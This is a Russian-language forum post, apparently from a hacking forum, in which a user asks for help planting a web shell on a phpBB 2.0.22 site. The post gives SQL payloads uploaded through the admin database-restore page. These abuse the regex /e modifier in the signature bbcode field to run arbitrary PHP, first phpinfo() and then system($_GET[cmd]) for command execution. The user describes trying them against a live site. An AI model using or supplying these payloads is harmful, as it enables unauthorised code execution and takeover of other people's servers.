phpBB 2.0.23 залить шелл

Discussion in 'Песочница' started by elvir, 12 Dec 2016.

  1. elvir

    elvir Banned

    Joined:
    30 Nov 2016
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Пытаюсь залить шелл на форум phpBB 2.0.22 этим способом:
    Code:
    Создаем текстовый файл 1.sql суем в него код Код: UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2; ну вместо 2 ставим свой id Заходим в админку, жмем востановление базы данных, выбираем файл 1.sql, и со звуком хлопец-хлопца-хоп-ца-ца заходим в профайл а наблюдаем phpinfo()
    Напоминаю, после ":" идет любой php код.
    захожу по адресу: site.ru/ff/profile.php?mode=editprofile (т.е в профиль) phpinfo() выдает.
    Далее заливаю такой код:
    Code:
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[cmd]);' WHERE user_id=2;
    захожу по адресу: site.ru/ff/profile.php?mode=editprofile (т.е в профиль) пробую: site.ru/ff/profile.php?cmd=ls итог: просто редирект на главную страницу.
    Что делать?
     
Loading...